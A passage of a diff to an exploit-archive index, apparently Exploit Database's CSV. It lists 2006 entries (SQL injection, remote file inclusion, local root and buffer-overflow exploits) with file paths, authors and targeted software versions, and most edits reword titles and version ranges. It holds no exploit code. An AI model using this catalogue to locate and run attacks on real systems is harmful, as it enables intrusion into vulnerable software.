(french)",2006-07-07,"Jerome Athias",windows,local,0 -1993,platforms/php/webapps/1993.php,"PAPOO <= 3_RC3 SQL Injection/Admin Credentials Disclosure Exploit",2006-07-07,rgod,php,webapps,0 -1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component <= 1.1.0 - Remote Include",2006-07-08,h4ntu,php,webapps,0 -1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component <= 1.2.4RC3 - Remote Include",2006-07-08,h4ntu,php,webapps,0 -1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO <= 2.2.4 - (pluginpath) Remote File Include",2006-07-09,A.nosrati,php,webapps,0 +1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privileges Escalation/Remote Code Execution Exploit",2006-07-07,rgod,php,webapps,0 +1992,platforms/windows/local/1992.py,"WinRAR 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit (french)",2006-07-07,"Jerome Athias",windows,local,0 +1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 SQL Injection/Admin Credentials Disclosure Exploit",2006-07-07,rgod,php,webapps,0 +1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component 1.1.0 - Remote Include",2006-07-08,h4ntu,php,webapps,0 +1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component 1.2.4RC3 - Remote Include",2006-07-08,h4ntu,php,webapps,0 +1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - (pluginpath) Remote File Inclusion",2006-07-09,A.nosrati,php,webapps,0 1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (PHP)",2006-07-09,joffer,multiple,remote,10000 -1998,platforms/php/webapps/1998.pl,"Ottoman CMS <= 1.1.3 - (default_path) Remote File Inclusion Exploit",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 +1998,platforms/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - (default_path) Remote File Inclusion Exploit",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC",2006-07-09,"SYS 49152",windows,local,0 2000,platforms/hardware/dos/2000.pl,"SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC",2006-07-10,"Michael Thumann",hardware,dos,0 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0 2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0 -2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 +2003,platforms/php/webapps/2003.txt,"SQuery 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0 2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0 -2007,platforms/php/webapps/2007.php,"phpBB 3 - (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0 +2007,platforms/php/webapps/2007.php,"phpBB 3 - (memberlist.php) SQL Injection Exploit",2006-07-13,rgod,php,webapps,0 2008,platforms/php/webapps/2008.php,"Phorum 5 - (pm.php) Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0 -2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0 -2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0 +2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0 +2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection Exploit",2006-07-14,RusH,php,webapps,0 2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0 -2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit",2006-07-15,h00lyshit,linux,local,0 +2013,platforms/linux/local/2013.c,"Linux Kernel 2.6.17.4 - 'proc' Local Root Exploit",2006-07-15,h00lyshit,linux,local,0 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515 -2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 -2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 - (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 +2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 +2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (Perl)",2006-07-15,UmZ,multiple,remote,10000 -2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 - (class.rich.php) Remote Inclusion",2006-07-16,igi,php,webapps,0 -2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod <= 1.2 - (m2f_root_path) Remote Include Vulnerabilities",2006-07-17,OLiBekaS,php,webapps,0 -2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component <= 0.3en Remote Include",2006-07-17,h4ntu,php,webapps,0 -2021,platforms/php/webapps/2021.txt,"SMF Forum Mambo Component <= 1.3.1.3 Include",2006-07-17,ASIANEAGLE,php,webapps,0 -2022,platforms/php/webapps/2022.txt,"com_extcalendar Mambo Component <= 2.0 Include",2006-07-17,OLiBekaS,php,webapps,0 -2023,platforms/php/webapps/2023.txt,"com_loudmouth Mambo Component <= 4.0j - Include",2006-07-17,h4ntu,php,webapps,0 -2024,platforms/php/webapps/2024.txt,"pc_cookbook Mambo Component <= 0.3 Include",2006-07-17,Matdhule,php,webapps,0 -2025,platforms/php/webapps/2025.txt,"perForms Mambo Component <= 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0 -2026,platforms/php/webapps/2026.txt,"com_hashcash Mambo Component <= 1.2.1 Include",2006-07-17,Matdhule,php,webapps,0 -2027,platforms/php/webapps/2027.txt,"HTMLArea3 Mambo Module <= 1.5 - Remote Include",2006-07-17,Matdhule,php,webapps,0 -2028,platforms/php/webapps/2028.txt,"Sitemap Mambo Component <= 2.0.0 - Remote Include",2006-07-17,Matdhule,php,webapps,0 -2029,platforms/php/webapps/2029.txt,"pollxt Mambo Component <= 1.22.07 - Remote Include",2006-07-17,vitux,php,webapps,0 -2030,platforms/php/webapps/2030.txt,"MiniBB Mambo Component <= 1.5a Remote File Include Vulnerabilities",2006-07-17,Matdhule,php,webapps,0 +2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - (class.rich.php) Remote Inclusion",2006-07-16,igi,php,webapps,0 +2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote Include Vulnerabilities",2006-07-17,OLiBekaS,php,webapps,0 +2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component 0.3en Remote Include",2006-07-17,h4ntu,php,webapps,0 +2021,platforms/php/webapps/2021.txt,"SMF Forum Mambo Component 1.3.1.3 Include",2006-07-17,ASIANEAGLE,php,webapps,0 +2022,platforms/php/webapps/2022.txt,"com_extcalendar Mambo Component 2.0 Include",2006-07-17,OLiBekaS,php,webapps,0 +2023,platforms/php/webapps/2023.txt,"com_loudmouth Mambo Component 4.0j - Include",2006-07-17,h4ntu,php,webapps,0 +2024,platforms/php/webapps/2024.txt,"pc_cookbook Mambo Component 0.3 Include",2006-07-17,Matdhule,php,webapps,0 +2025,platforms/php/webapps/2025.txt,"perForms Mambo Component 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0 +2026,platforms/php/webapps/2026.txt,"com_hashcash Mambo Component 1.2.1 Include",2006-07-17,Matdhule,php,webapps,0 +2027,platforms/php/webapps/2027.txt,"HTMLArea3 Mambo Module 1.5 - Remote Include",2006-07-17,Matdhule,php,webapps,0 +2028,platforms/php/webapps/2028.txt,"Sitemap Mambo Component 2.0.0 - Remote Include",2006-07-17,Matdhule,php,webapps,0 +2029,platforms/php/webapps/2029.txt,"pollxt Mambo Component 1.22.07 - Remote Include",2006-07-17,vitux,php,webapps,0 +2030,platforms/php/webapps/2030.txt,"MiniBB Mambo Component 1.5a Remote File Inclusion Vulnerabilities",2006-07-17,Matdhule,php,webapps,0 2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - logrotate prctl() Local Root Exploit",2006-07-18,"Marco Ivaldi",linux,local,0 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0 -2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0 +2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0 -2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0 +2035,platforms/php/webapps/2035.php,"toendaCMS 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0 -2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 - (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0 +2037,platforms/windows/dos/2037.c,"Dumb 0.9.3 - (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0 2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 - (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0 -2046,platforms/php/webapps/2046.txt,"iManage CMS <= 4.0.12 - (absolute_path) Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 -2047,platforms/windows/remote/2047.pl,"FileCOPA FTP Server <= 1.01 - (LIST) Remote Buffer Overflow Exploit",2006-07-20,"Jacopo Cervini",windows,remote,0 +2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - (absolute_path) Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 +2047,platforms/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - (LIST) Remote Buffer Overflow Exploit",2006-07-20,"Jacopo Cervini",windows,remote,0 2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - (JBoss) Remote Code Execution Exploit",2006-07-20,"Jon Hart",hardware,remote,0 -2049,platforms/php/webapps/2049.txt,"SiteDepth CMS <= 3.0.1 - (SD_DIR) Remote File Include",2006-07-20,Aesthetico,php,webapps,0 -2050,platforms/php/webapps/2050.php,"LoudBlog <= 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 -2051,platforms/linux/dos/2051.py,"Sendmail <= 8.13.5 - Remote Signal Handling Exploit PoC",2006-07-21,redsand,linux,dos,0 +2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0 +2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 +2051,platforms/linux/dos/2051.py,"Sendmail 8.13.5 - Remote Signal Handling Exploit PoC",2006-07-21,redsand,linux,dos,0 2052,platforms/windows/remote/2052.sh,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0 2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0 -2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 +2058,platforms/php/webapps/2058.txt,"PHP Forge 3 beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 2060,platforms/php/webapps/2060.txt,"PHP Live! <= 3.2.1 - (help.php) Remote Inclusion",2006-07-23,magnific,php,webapps,0 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0 -2062,platforms/php/webapps/2062.txt,"MoSpray Mambo Component <= 18RC1 - Remote Include",2006-07-23,"Kurdish Security",php,webapps,0 -2063,platforms/php/webapps/2063.txt,"ArticlesOne <= 07232006 - (page) Remote Include",2006-07-23,CyberLord,php,webapps,0 +2062,platforms/php/webapps/2062.txt,"MoSpray Mambo Component 18RC1 - Remote Include",2006-07-23,"Kurdish Security",php,webapps,0 +2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote Include",2006-07-23,CyberLord,php,webapps,0 2064,platforms/php/webapps/2064.txt,"Mam-Moodle Mambo Component alpha Remote Inclusion",2006-07-23,jank0,php,webapps,0 -2065,platforms/windows/local/2065.c,"Cheese Tracker <= 0.9.9 - Local Buffer Overflow Exploit PoC",2006-07-23,"Luigi Auriemma",windows,local,0 -2066,platforms/php/webapps/2066.txt,"multibanners Mambo Component <= 1.0.1 - Remote Inclusion",2006-07-23,Blue|Spy,php,webapps,0 -2067,platforms/solaris/local/2067.c,"Solaris <= 10 - sysinfo() Local Kernel Memory Disclosure Exploit",2006-07-24,prdelka,solaris,local,0 -2068,platforms/php/webapps/2068.php,"X7 Chat <= 2.0.4 - (old_prefix) Remote Blind SQL Injection Exploit",2006-07-24,rgod,php,webapps,0 -2069,platforms/php/webapps/2069.txt,"PrinceClan Chess Mambo Com <= 0.8 - Remote Inclusion",2006-07-24,OLiBekaS,php,webapps,0 +2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow Exploit PoC",2006-07-23,"Luigi Auriemma",windows,local,0 +2066,platforms/php/webapps/2066.txt,"multibanners Mambo Component 1.0.1 - Remote Inclusion",2006-07-23,Blue|Spy,php,webapps,0 +2067,platforms/solaris/local/2067.c,"Solaris 10 - sysinfo() Local Kernel Memory Disclosure Exploit",2006-07-24,prdelka,solaris,local,0 +2068,platforms/php/webapps/2068.php,"X7 Chat 2.0.4 - (old_prefix) Remote Blind SQL Injection Exploit",2006-07-24,rgod,php,webapps,0 +2069,platforms/php/webapps/2069.txt,"PrinceClan Chess Mambo Com 0.8 - Remote Inclusion",2006-07-24,OLiBekaS,php,webapps,0 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit",2006-07-24,"Jacopo Cervini",windows,remote,5060 -2071,platforms/php/webapps/2071.php,"Etomite CMS <= 0.6.1 - (username) SQL Injection Exploit (mq = off)",2006-07-25,rgod,php,webapps,0 -2072,platforms/php/webapps/2072.php,"Etomite CMS <= 0.6.1 - (rfiles.php) Remote Command Execution Exploit",2006-07-25,rgod,php,webapps,0 -2073,platforms/multiple/dos/2073.c,"libmikmod <= 3.2.2 - (GT2 loader) Local Heap Overflow PoC",2006-07-25,"Luigi Auriemma",multiple,dos,0 +2071,platforms/php/webapps/2071.php,"Etomite CMS 0.6.1 - (username) SQL Injection Exploit (mq = off)",2006-07-25,rgod,php,webapps,0 +2072,platforms/php/webapps/2072.php,"Etomite CMS 0.6.1 - (rfiles.php) Remote Command Execution Exploit",2006-07-25,rgod,php,webapps,0 +2073,platforms/multiple/dos/2073.c,"libmikmod 3.2.2 - (GT2 loader) Local Heap Overflow PoC",2006-07-25,"Luigi Auriemma",multiple,dos,0 2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit)",2006-07-26,ri0t,windows,remote,10616 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit)",2006-07-26,ri0t,windows,remote,0 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow Exploit (PoC)",2006-07-26,c0rrupt,windows,remote,5061 -2077,platforms/php/webapps/2077.txt,"WMNews <= 0.2a (base_datapath) Remote Inclusion",2006-07-27,uNfz,php,webapps,0 -2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component <= 18RC1 Include",2006-07-27,Dr.Jr7,php,webapps,0 +2077,platforms/php/webapps/2077.txt,"WMNews 0.2a (base_datapath) Remote Inclusion",2006-07-27,uNfz,php,webapps,0 +2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component 18RC1 Include",2006-07-27,Dr.Jr7,php,webapps,0 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA (Syslog Server) Remote Buffer Overflow Exploit",2006-07-27,"Kevin Finisterre",windows,remote,12345 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 -2081,platforms/php/webapps/2081.txt,"Portail PHP <= 1.7 - (chemin) Remote Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 -2082,platforms/multiple/remote/2082.html,"Mozilla Firefox <= 1.5.0.4 - Javascript Navigator Object Code Execution PoC",2006-07-28,"H D Moore",multiple,remote,0 -2083,platforms/php/webapps/2083.txt,"Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities",2006-07-28,Drago84,php,webapps,0 -2084,platforms/php/webapps/2084.txt,"Mambo MGM Component <= 0.95r2 - Remote Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0 -2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component <= 1.2 - Remote Inclusion",2006-07-29,Drago84,php,webapps,0 -2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component <= 3.1b Remote Inclusion",2006-07-29,Dr.Jr7,php,webapps,0 +2081,platforms/php/webapps/2081.txt,"Portail PHP 1.7 - (chemin) Remote Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 +2082,platforms/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - Javascript Navigator Object Code Execution PoC",2006-07-28,"H D Moore",multiple,remote,0 +2083,platforms/php/webapps/2083.txt,"Mambo Security Images Component 3.0.5 - Inclusion Vulnerabilities",2006-07-28,Drago84,php,webapps,0 +2084,platforms/php/webapps/2084.txt,"Mambo MGM Component 0.95r2 - Remote Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0 +2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component 1.2 - Remote Inclusion",2006-07-29,Drago84,php,webapps,0 +2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component 3.1b Remote Inclusion",2006-07-29,Dr.Jr7,php,webapps,0 2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - (cookie) Remote Code Excution Exploit",2006-07-29,r00t,php,webapps,0 -2088,platforms/php/webapps/2088.php,"ATutor <= 1.5.3.1 - (links) Remote Blind SQL Injection Exploit",2006-07-30,rgod,php,webapps,0 -2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component <= 0.5 - Remote Include",2006-07-30,"Kurdish Security",php,webapps,0 -2090,platforms/php/webapps/2090.txt,"Joomla com_bayesiannaivefilter Component <= 1.1 Inclusion",2006-07-30,Pablin77,php,webapps,0 +2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - (links) Remote Blind SQL Injection Exploit",2006-07-30,rgod,php,webapps,0 +2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component 0.5 - Remote Include",2006-07-30,"Kurdish Security",php,webapps,0 +2090,platforms/php/webapps/2090.txt,"Joomla com_bayesiannaivefilter Component 1.1 Inclusion",2006-07-30,Pablin77,php,webapps,0 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution Exploit (french)",2006-07-30,NSRocket,windows,local,0 -2092,platforms/php/webapps/2092.txt,"Joomla LMO Component <= 1.0b2 - Remote Include",2006-07-30,vitux,php,webapps,0 -2094,platforms/windows/local/2094.c,"Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 - Multiple BoF Exploit",2006-07-31,"Luigi Auriemma",windows,local,0 +2092,platforms/php/webapps/2092.txt,"Joomla LMO Component 1.0b2 - Remote Include",2006-07-30,vitux,php,webapps,0 +2094,platforms/windows/local/2094.c,"Open Cubic Player 2.6.0pre6 / 0.1.10_rc5 - Multiple BoF Exploit",2006-07-31,"Luigi Auriemma",windows,local,0 2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - (pathtohomedir) Remote Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 -2096,platforms/php/webapps/2096.txt,"MyNewsGroups <= 0.6b (myng_root) Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps,0 -2097,platforms/php/webapps/2097.txt,"NewsLetter <= 3.5 - (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 -2098,platforms/php/webapps/2098.txt,"TSEP <= 0.942 - (copyright.php) Remote Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 -2099,platforms/php/webapps/2099.txt,"WoW Roster <= 1.5.1 - (subdir) Remote File Include",2006-08-01,skulmatic,php,webapps,0 +2096,platforms/php/webapps/2096.txt,"MyNewsGroups 0.6b (myng_root) Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps,0 +2097,platforms/php/webapps/2097.txt,"NewsLetter 3.5 - (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 +2098,platforms/php/webapps/2098.txt,"TSEP 0.942 - (copyright.php) Remote Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 +2099,platforms/php/webapps/2099.txt,"WoW Roster 1.5.1 - (subdir) Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 2100,platforms/php/webapps/2100.txt,"PHPAuction 2.1 - (phpAds_path) Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 -2101,platforms/php/webapps/2101.txt,"newsReporter <= 1.1 - (index.php) Remote Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 -2102,platforms/php/webapps/2102.txt,"Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 -2103,platforms/php/webapps/2103.txt,"k_shoutbox <= 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 -2104,platforms/php/webapps/2104.txt,"k_fileManager <= 1.2 - (dwl_include_path) Remote Inclusion",2006-08-01,SHiKaA,php,webapps,0 -2105,platforms/php/webapps/2105.php,"XMB <= 1.9.6 - (u2uid) Remote SQL Injection Exploit (mq=off)",2006-08-01,rgod,php,webapps,0 -2106,platforms/osx/local/2106.pl,"Mac OS X <= 10.4.7 - fetchmail Privilege Escalation Exploit (x86)",2006-08-01,"Kevin Finisterre",osx,local,0 -2107,platforms/osx/local/2107.pl,"Mac OS X <= 10.4.7 - fetchmail Privilege Escalation Exploit (ppc)",2006-08-01,"Kevin Finisterre",osx,local,0 -2108,platforms/osx/local/2108.sh,"Mac OS X <= 10.4.7 - fetchmail Privilege Escalation Exploit",2006-08-01,"Kevin Finisterre",osx,local,0 -2109,platforms/php/webapps/2109.txt,"WoW Roster <= 1.70 - (/lib/phpbb.php) Remote File Include",2006-08-02,|peti,php,webapps,0 -2110,platforms/php/webapps/2110.pm,"TWiki <= 4.0.4 - (Configure Script) Remote Code Execution Exploit (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 -2111,platforms/osx/local/2111.pl,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local BoF Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 -2113,platforms/php/webapps/2113.txt,"SaveWeb Portal <= 3.4 - (SITE_Path) Remote File Inclusion Vulnerabilities",2006-08-02,"Mehmet Ince",php,webapps,0 -2114,platforms/php/webapps/2114.htm,"TinyPHP Forum <= 3.6 - (makeadmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 -2115,platforms/php/webapps/2115.txt,"Kayako eSupport <= 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 -2116,platforms/php/webapps/2116.txt,"TSEP <= 0.942 - (colorswitch.php) Remote Inclusion",2006-08-02,beford,php,webapps,0 -2117,platforms/php/webapps/2117.php,"SendCard <= 3.4.0 Unauthorized Administrative Access Exploit",2006-08-03,rgod,php,webapps,0 -2118,platforms/php/webapps/2118.php,"myBloggie <= 2.1.4 - (trackback.php) Multiple SQL Injections Exploit",2006-08-07,rgod,php,webapps,0 -2119,platforms/php/webapps/2119.txt,"PHP Simple Shop <= 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 -2120,platforms/php/webapps/2120.txt,"PHP Live Helper <= 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 +2101,platforms/php/webapps/2101.txt,"newsReporter 1.1 - (index.php) Remote Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 +2102,platforms/php/webapps/2102.txt,"Voodoo chat 1.0RC1b (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 +2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 +2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - (dwl_include_path) Remote Inclusion",2006-08-01,SHiKaA,php,webapps,0 +2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (u2uid) SQL Injection Exploit (mq=off)",2006-08-01,rgod,php,webapps,0 +2106,platforms/osx/local/2106.pl,"Mac OS X 10.4.7 - fetchmail Privilege Escalation Exploit (x86)",2006-08-01,"Kevin Finisterre",osx,local,0 +2107,platforms/osx/local/2107.pl,"Mac OS X 10.4.7 - fetchmail Privilege Escalation Exploit (ppc)",2006-08-01,"Kevin Finisterre",osx,local,0 +2108,platforms/osx/local/2108.sh,"Mac OS X 10.4.7 - fetchmail Privilege Escalation Exploit",2006-08-01,"Kevin Finisterre",osx,local,0 +2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - (/lib/phpbb.php) Remote File Inclusion",2006-08-02,|peti,php,webapps,0 +2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution Exploit (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 +2111,platforms/osx/local/2111.pl,"Mac OS X 10.3.8 - (CF_CHARSET_PATH) Local BoF Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 +2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - (SITE_Path) Remote File Inclusion Vulnerabilities",2006-08-02,"Mehmet Ince",php,webapps,0 +2114,platforms/php/webapps/2114.htm,"TinyPHP Forum 3.6 - (makeadmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 +2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 +2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote Inclusion",2006-08-02,beford,php,webapps,0 +2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 Unauthorized Administrative Access Exploit",2006-08-03,rgod,php,webapps,0 +2118,platforms/php/webapps/2118.php,"myBloggie 2.1.4 - (trackback.php) Multiple SQL Injections Exploit",2006-08-07,rgod,php,webapps,0 +2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 